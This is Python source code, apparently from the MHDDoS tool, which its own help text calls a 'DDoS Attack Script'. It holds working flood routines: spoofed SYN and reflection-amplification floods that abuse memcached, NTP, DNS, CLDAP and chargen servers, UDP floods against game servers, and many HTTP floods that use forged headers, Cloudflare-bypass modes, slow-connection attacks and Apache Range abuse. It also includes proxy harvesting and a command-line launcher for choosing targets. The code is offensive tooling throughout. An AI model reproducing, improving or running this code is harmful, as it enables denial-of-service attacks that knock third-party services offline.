self._amp_payload = (b'\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x00'
b'\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x63\x6c\x61\x73\x73\x30\x00',
389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (
b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (
b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00',
53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, randbytes(1024)):
continue
Tools.safe_close(s)
def MINECRAFT(self) -> None:
handshake = Minecraft.handshake(self._target, 74, 1)
ping = Minecraft.data(b'\x00')
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while Tools.send(s, handshake):
Tools.send(s, ping)
Tools.safe_close(s)
def CPS(self) -> None:
global REQUESTS_SENT
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
REQUESTS_SENT += 1
Tools.safe_close(s)
def alive_connection(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
while s.recv(1):
continue
Tools.safe_close(s)
def CONNECTION(self) -> None:
global REQUESTS_SENT
with suppress(Exception):
Thread(target=self.alive_connection).start()
REQUESTS_SENT += 1
def UDP(self) -> None:
s = None
with suppress(Exception), socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, randbytes(1024), self._target):
continue
Tools.safe_close(s)
def SYN(self) -> None:
payload = self._genrate_syn()
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def AMP(self) -> None:
payload = next(self._amp_payloads)
s = None
with suppress(Exception), socket(AF_INET, SOCK_RAW,
IPPROTO_UDP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while Tools.sendto(s, *payload):
continue
Tools.safe_close(s)
def MCBOT(self) -> None:
s = None
with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s:
Tools.send(s, Minecraft.handshake_forwarded(self._target,
47,
2,
ProxyTools.Random.rand_ipv4(),
uuid4()))
Tools.send(s, Minecraft.login(f"MHDDoS_{ProxyTools.Random.rand_str(5)}"))
sleep(1.5)
c = 360
while Tools.send(s, Minecraft.keepalive(ProxyTools.Random.rand_int(1111111, 9999999))):
c -= 1
if c:
continue
c = 360
Tools.send(s, Minecraft.chat(Tools.randchr(100)))
Tools.safe_close(s)
def VSE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def FIVEM(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\xff\xff\xff\xffgetinfo xxx\x00\x00\x00'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def TS3(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = b'\x05\xca\x7f\x16\x9c\x11\xf9\x89\x00\x00\x00\x00\x02'
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def MCPE(self) -> None:
global BYTES_SEND, REQUESTS_SENT
payload = (b'\x61\x74\x6f\x6d\x20\x64\x61\x74\x61\x20\x6f\x6e\x74\x6f\x70\x20\x6d\x79\x20\x6f'
b'\x77\x6e\x20\x61\x73\x73\x20\x61\x6d\x70\x2f\x74\x72\x69\x70\x68\x65\x6e\x74\x20'
b'\x69\x73\x20\x6d\x79\x20\x64\x69\x63\x6b\x20\x61\x6e\x64\x20\x62\x61\x6c\x6c'
b'\x73')
with socket(AF_INET, SOCK_DGRAM) as s:
while Tools.sendto(s, payload, self._target):
continue
Tools.safe_close(s)
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(getMyIPAddress())
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(ProxyTools.Random.rand_int(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException,PyUnusedLocal
class HttpFlood(Thread):
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self,
thread_id: int,
target: URL,
host: str,
method: str = "GET",
rpc: int = 1,
synevent: Event = None,
useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
Thread.__init__(self, daemon=True)
self.SENT_FLOOD = None
self._thread_id = thread_id
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._host = host
self._raw_target = (self._host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (self._host, (self._target.port or 80))
if not referers:
referers: List[str] = [
"https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="
]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0'
]
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/%s\r\n" % (self._req_type,
target.raw_path_qs, randchoice(['1.0', '1.1', '1.2']))
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while self._synevent.is_set():
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
return ("X-Forwarded-Proto: Http\r\n"
f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
f"Via: {spoof}\r\n"
f"Client-IP: {spoof}\r\n"
f'X-Forwarded-For: {spoof}\r\n'
f'Real-IP: {spoof}\r\n')
def generate_payload(self, other: str = None) -> bytes:
return str.encode((self._payload +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
(other if other else "") +
"\r\n"))
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket(AF_INET, SOCK_STREAM)
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.settimeout(60)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock,
server_hostname=self._target.host,
server_side=False,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
return (f"User-Agent: {randchoice(self._useragents)}\r\n"
f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n" +
self.SpoofIP)
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"DYN", "SLOW", "PPS", "APACHE",
"BOT", } \
else "POST" if {method.upper()} & {"POST", "XMLRPC", "STRESS"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(32))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def STRESS(self) -> None:
payload: bytes = self.generate_payload(
(f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}') % ProxyTools.Random.rand_str(512))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def COOKIES(self) -> None:
payload: bytes = self.generate_payload(
"Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" %
(ProxyTools.Random.rand_int(1000, 99999), ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def APACHE(self) -> None:
payload: bytes = self.generate_payload(
"Range: bytes=0-,%s" % ",".join("5-%d" % i
for i in range(1, 1024)))
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(
("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>") %
(ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def PPS(self) -> None:
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, self._defaultpayload)
Tools.safe_close(s)
def GET(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOT(self) -> None:
payload: bytes = self.generate_payload()
p1, p2 = str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, p1)
Tools.send(s, p2)
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
while Tools.send(s, payload) and s.recv(1):
continue
Tools.safe_close(s)
def OVH(self) -> None:
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
Tools.send(s, payload)
Tools.safe_close(s)
def CFB(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), create_scraper() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def CFBUAM(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
Tools.send(s, payload)
sleep(5.01)
ts = time()
for _ in range(self._rpc):
Tools.send(s, payload)
if time() > ts + 120: break
Tools.safe_close(s)
def AVB(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
Tools.send(s, payload)
Tools.safe_close(s)
def DGB(self):
global REQUESTS_SENT, BYTES_SEND
s = None
with suppress(Exception), Session() as s:
with s.post(self._target.human_repr()) as ss:
ss.raise_for_status()
for key, value in ss.cookies.items():
s.cookies.set_cookie(cookies.create_cookie(key, value))
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def DYN(self):
payload: Any = str.encode(self._payload +
"Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority) +
self.randHeadercontent +
"\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def DOWNLOADER(self):
payload: Any = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while 1:
sleep(.01)
data = s.recv(1)
if not data:
break
Tools.send(s, b'0')
Tools.safe_close(s)
def BYPASS(self):
global REQUESTS_SENT, BYTES_SEND
pro = None
if self._proxies:
pro = randchoice(self._proxies)
s = None
with suppress(Exception), Session() as s:
for _ in range(self._rpc):
if pro:
with s.get(self._target.human_repr(),
proxies=pro.asRequest()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
continue
with s.get(self._target.human_repr()) as res:
REQUESTS_SENT += 1
BYTES_SEND += Tools.sizeOfRequest(res)
Tools.safe_close(s)
def GSB(self):
payload = str.encode("%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type,
self._target.raw_path_qs,
ProxyTools.Random.rand_str(6)) +
"Host: %s\r\n" % self._target.authority +
self.randHeadercontent +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n\r\n')
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def NULL(self) -> None:
payload: Any = str.encode(self._payload +
"Host: %s\r\n" % self._target.authority +
"User-Agent: null\r\n" +
"Referrer: null\r\n" +
self.SpoofIP + "\r\n")
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
Tools.safe_close(s)
def BOMB(self):
assert self._proxies, \
'This method requires proxies. ' \
'Without proxies you can use github.com/codesenberg/bombardier'
while True:
proxy = randchoice(self._proxies)
if proxy.type != ProxyType.SOCKS4:
break
res = run(
[
f'{bombardier_path}',
f'--connections={self._rpc}',
'--http2',
'--method=GET',
'--latencies',
'--timeout=30s',
f'--requests={self._rpc}',
f'--proxy={proxy}',
f'{self._target.human_repr()}',
],
stdout=PIPE,
)
if self._thread_id == 0:
print(proxy, res.stdout.decode(), sep='\n')
def SLOW(self):
payload: bytes = self.generate_payload()
s = None
with suppress(Exception), self.open_connection() as s:
for _ in range(self._rpc):
Tools.send(s, payload)
while Tools.send(s, payload) and s.recv(1):
for i in range(self._rpc):
keep = str.encode("X-a: %d\r\n" % ProxyTools.Random.rand_int(1, 5000))
Tools.send(s, keep)
sleep(self._rpc / 15)
break
Tools.safe_close(s)
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST":
self.SENT_FLOOD = self.POST
if name == "CFB":
self.SENT_FLOOD = self.CFB
if name == "CFBUAM":
self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC":
self.SENT_FLOOD = self.XMLRPC
if name == "BOT":
self.SENT_FLOOD = self.BOT
if name == "APACHE":
self.SENT_FLOOD = self.APACHE
if name == "BYPASS":
self.SENT_FLOOD = self.BYPASS
if name == "DGB":
self.SENT_FLOOD = self.DGB
if name == "OVH":
self.SENT_FLOOD = self.OVH
if name == "AVB":
self.SENT_FLOOD = self.AVB
if name == "STRESS":
self.SENT_FLOOD = self.STRESS
if name == "DYN":
self.SENT_FLOOD = self.DYN
if name == "SLOW":
self.SENT_FLOOD = self.SLOW
if name == "GSB":
self.SENT_FLOOD = self.GSB
if name == "NULL":
self.SENT_FLOOD = self.NULL
if name == "COOKIE":
self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (
self._defaultpayload +
"Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
if name == "DOWNLOADER": self.SENT_FLOOD = self.DOWNLOADER
if name == "BOMB": self.SENT_FLOOD = self.BOMB
class ProxyManager:
@staticmethod
def DownloadFromConfig(cf, Proxy_type: int) -> Set[Proxy]:
providrs = [
provider for provider in cf["proxy-providers"]
if provider["type"] == Proxy_type or Proxy_type == 0
]
logger.info("Downloading Proxies form %d Providers" % len(providrs))
proxes: Set[Proxy] = set()
with ThreadPoolExecutor(len(providrs)) as executor:
future_to_download = {
executor.submit(
ProxyManager.download, provider,
ProxyType.stringToProxyType(str(provider["type"])))
for provider in providrs
}
for future in as_completed(future_to_download):
for pro in future.result():
proxes.add(pro)
return proxes
@staticmethod
def download(provider, proxy_type: ProxyType) -> Set[Proxy]:
logger.debug(
"Downloading Proxies form (URL: %s, Type: %s, Timeout: %d)" %
(provider["url"], proxy_type.name, provider["timeout"]))
proxes: Set[Proxy] = set()
with suppress(TimeoutError, exceptions.ConnectionError,
exceptions.ReadTimeout):
data = get(provider["url"], timeout=provider["timeout"]).text
try:
for proxy in ProxyUtiles.parseAllIPPort(
data.splitlines(), proxy_type):
proxes.add(proxy)
except Exception as e:
logger.error(f'Download Proxy Error: {(e.__str__() or e.__repr__())}')
return proxes
class ToolsConsole:
METHODS = {"INFO", "TSSRV", "CFIP", "DNS", "PING", "CHECK", "DSTAT"}
@staticmethod
def checkRawSocket():
with suppress(OSError):
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP):
return True
return False
@staticmethod
def runConsole():
cons = f"{gethostname()}@MHTools:~#"
while 1:
cmd = input(cons + " ").strip()
if not cmd: continue
if " " in cmd:
cmd, args = cmd.split(" ", 1)
cmd = cmd.upper()
if cmd == "HELP":
print("Tools:" + ", ".join(ToolsConsole.METHODS))
print("Commands: HELP, CLEAR, BACK, EXIT")
continue
if (cmd == "E") or \
(cmd == "EXIT") or \
(cmd == "Q") or \
(cmd == "QUIT") or \
(cmd == "LOGOUT") or \
(cmd == "CLOSE"):
exit(-1)
if cmd == "CLEAR":
print("\033c")
continue
if not {cmd} & ToolsConsole.METHODS:
print(f"{cmd} command not found")
continue
if cmd == "DSTAT":
with suppress(KeyboardInterrupt):
ld = net_io_counters(pernic=False)
while True:
sleep(1)
od = ld
ld = net_io_counters(pernic=False)
t = [(last - now) for now, last in zip(od, ld)]
logger.info(
("Bytes Sended %s\n"
"Bytes Recived %s\n"
"Packets Sended %s\n"
"Packets Recived %s\n"
"ErrIn %s\n"
"ErrOut %s\n"
"DropIn %s\n"
"DropOut %s\n"
"Cpu Usage %s\n"
"Memory %s\n") %
(Tools.humanbytes(t[0]), Tools.humanbytes(t[1]),
Tools.humanformat(t[2]), Tools.humanformat(t[3]),
t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
logger.info("please wait ...")
with get(domain, timeout=20) as r:
logger.info(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info(f"TCP: {(info['_tsdns._tcp.'])}\n")
logger.info(f"UDP: {(info['_ts3._udp.'])}\n")
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
logger.info("please wait ...")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
records = ['_ts3._udp.', '_tsdns._tcp.']
DnsResolver = resolver.Resolver()
DnsResolver.timeout = 1
DnsResolver.lifetime = 1
Info = {}
for rec in records:
try:
srv_records = resolver.resolve(rec + domain, 'SRV')
for srv in srv_records:
Info[rec] = str(srv.target).rstrip('.') + ':' + str(
srv.port)
except:
Info[rec] = 'Not found'
return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
with suppress(Exception), get("https://ipwhois.app/json/%s/" % domain) as s:
return s.json()
return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
if proxy_ty not in {4, 5, 1, 0, 6}:
exit("Socks Type Not Found [4, 5, 1, 0, 6]")
if proxy_ty == 6:
proxy_ty = randchoice([4, 5, 1])
if not proxy_li.exists():
logger.warning("The file doesn't exist, creating files and downloading proxies.")
proxy_li.parent.mkdir(parents=True, exist_ok=True)
with proxy_li.open("w") as wr:
Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
logger.info(
f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
)
Proxies = ProxyChecker.checkAll(
Proxies, timeout=1, threads=threads,
url=url.human_repr() if url else "http://httpbin.org/get",
)
if not Proxies:
exit(
"Proxy Check failed, Your network may be the problem"
" | The target may not be available."
)
stringBuilder = ""
for proxy in Proxies:
stringBuilder += (proxy.__str__() + "\n")
wr.write(stringBuilder)
proxies = ProxyUtiles.readFromFile(proxy_li)
if proxies:
logger.info(f"Proxy Count: {len(proxies):,}")
else:
logger.info(
"Empty Proxy File, running flood witout proxy")
proxies = None
return proxies
if __name__ == '__main__':
with open(__dir__ / "config.json") as f:
con = load(f)
with suppress(KeyboardInterrupt):
with suppress(IndexError):
one = argv[1].upper()
if one == "HELP":
raise IndexError()
if one == "TOOLS":
ToolsConsole.runConsole()
if one == "STOP":
ToolsConsole.stop()
method = one
host = None
url = None
event = Event()
event.clear()
target = None
urlraw = argv[2].strip()
if not urlraw.startswith("http"):
urlraw = "http://" + urlraw
if method not in Methods.ALL_METHODS:
exit("Method Not Found %s" %
", ".join(Methods.ALL_METHODS))
if method in Methods.LAYER7_METHODS:
url = URL(urlraw)
host = url.host
try:
host = gethostbyname(url.host)
except Exception as e:
exit('Cannot resolve hostname ', url.host, e)
threads = int(argv[4])
rpc = int(argv[6])
timer = int(argv[7])
proxy_ty = int(argv[3].strip())
proxy_li = Path(__dir__ / "files/proxies/" /
argv[5].strip())
useragent_li = Path(__dir__ / "files/useragent.txt")
referers_li = Path(__dir__ / "files/referers.txt")
bombardier_path = Path.home() / "go/bin/bombardier"
proxies: Any = set()
if method == "BOMB":
assert (
bombardier_path.exists()
or bombardier_path.with_suffix('.exe').exists()
), (
"Install bombardier: "
"https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
)
if len(argv) == 9:
logger.setLevel("DEBUG")
if not useragent_li.exists():
exit("The Useragent file doesn't exist ")
if not referers_li.exists():
exit("The Referer file doesn't exist ")
uagents = set(a.strip()
for a in useragent_li.open("r+").readlines())
referers = set(a.strip()
for a in referers_li.open("r+").readlines())
